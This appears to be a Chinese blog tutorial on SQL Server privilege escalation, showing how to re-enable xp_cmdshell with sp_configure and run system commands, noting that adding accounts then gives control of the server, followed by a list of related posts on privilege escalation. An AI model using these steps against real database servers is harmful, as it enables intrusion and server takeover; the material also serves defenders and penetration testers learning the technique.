SQL Server提权之xp_cmdshell
前言
sql server提权主要依赖于sql server自带的存储过程。
存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使用execute命令执行存储过程。
注:
xp_cmdshell 默认在 mssql2000 中是开启的,在 mssql2005 之后的版本中则默认禁止。如果用户拥有管理员 sa 权限则可以用 sp_configure 重修开启它。
连接数据库后,先检查xp_cmdshell是否存在
结果为1
,则证明存在。
启用xp_cmdshell:
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭xp_cmdshell:
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;
开启xp_cmdshell
EXEC master..xp_cmdshell 'whoami'; #执行命令
// 至此,提权完毕(可通过添加账户等拿下该服务器权限)
SQL Server提权之xp_cmdshell相关推荐
- 第三方组件提权-SQL server提权
文章目录 基础 MSSQL权限级别 拿webshell xp_cmdshell执行系统命令 LOG备份getshell 提权 使用xp_cmdshell进行提权 以下内容为转载 使用sp_oacrea ...
- 【数据库提权】- SQL Server提权
渗透测试往往由信息收集开始,而提权是渗透测试中较为重要的环节,若始终以"低权限"身份进行渗透,测试出的问题相对于高权限的质量会低很多,权限提升意味着用户获得不允许他使用的权限.比如 ...
- SQL Server 2005如何起用 xp_cmdshell
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出.由于xp_cmdshell 可以执行任何操作系统命令,所以一旦SQL Server管理 ...
- sql server 2005下开启xp_cmdshell的办法
sql server 2005下开启xp_cmdshell的办法 2009年05月09日 星期六 下午 06:06 sql server 2005下开启xp_cmdshell的办法 EXEC sp_c ...
- 后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...
- mssql数据库提权中xp_cmdshell使用
mssql数据库提权中xp_cmdshell使用 获得sa密码后蚁剑连接数据库,可用xp_cmdshell执行系统命令 xp, extend procedure, 表示本存储过程是扩展的存储过程 cm ...
- 第60天-权限提升-MYMSORA 等 SQL 数据库提权
思维导图 权限提升 数据库提权 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码.除 Access 数据库外,其 ...
- 2008 r2 server 提权_Windows Server 2012 R2的提权过程解析
近期,我在进行一项安全评估的过程中遇到了一个麻烦.这是某个组织的一台远程桌面服务器,安装的是Windows Server 2012 R2系统,但是我手中的用户账号权限却非常低.由于我此前也进行过大量的 ...
- 2008 r2 server 提权_某次Windows渗透提权过程
0x01物色目标 大多数站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取.robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利 ...
最新文章
- 【orange】【转】orange使用
- 【随机】Kuroni and the Punishment(CF1305F)
- 微型计算机生产工艺,bb肥生产设备制造工艺流程
- Java BigInteger类| 带有示例的减去()方法
- ZBLOG简单的导航网站主题 支持内页详情目录模板
- asp.net 3.5 知识点
- PHP 查看系统文件时间戳
- luci L大_智慧城市大讲堂 l 大咖说5G智慧大交通
- 英特尔面向网络及边缘推出至强D系列处理器
- TypeError: __str__ returned non-string (type NoneType)
- BGP-13 配置BGP多路径发布
- 筛选出c语言成绩前五名的记录,c语言课程论文设计成绩记录簿.doc
- 机器学习(Machine Learning)深度学习(Deep Learning)较全面的资料
- 伽马校正(Gamma Correction)
- 易中天∑品读汉代风云人物
- 【笔记】创新思维工作坊(一)
- Golang 等比例调整图片分辨率且用黑色补齐多余部分
- Nginx配置代理多个服务及伪集群实现
- 校验手机号正则,支持166及199等手机号
- AIGC用于智能写作的技术综述-达观数据
热门文章
- java校园医院门诊管理系统ssm
- [华中科技计组实验]logisim完成单周期5级流水MIPS CPU
- 高职计算机应用与信息检索,高职计算机应用主题式教学模式实践
- Science封面:谁动了我的DNA?原来是你拿去做机器人了
- linux——基本工具:gcc/g++,make(makefile)与gdb
- 绿之韵传销被诬陷?看草根创业10年奋斗路
- php获取百度搜索的关键词,php获取从百度搜索进入网站的关键词
- html页面播放rtsp流媒体
- 口语语汇单词篇(4)
- ADB 相关 + FGO 脚本相关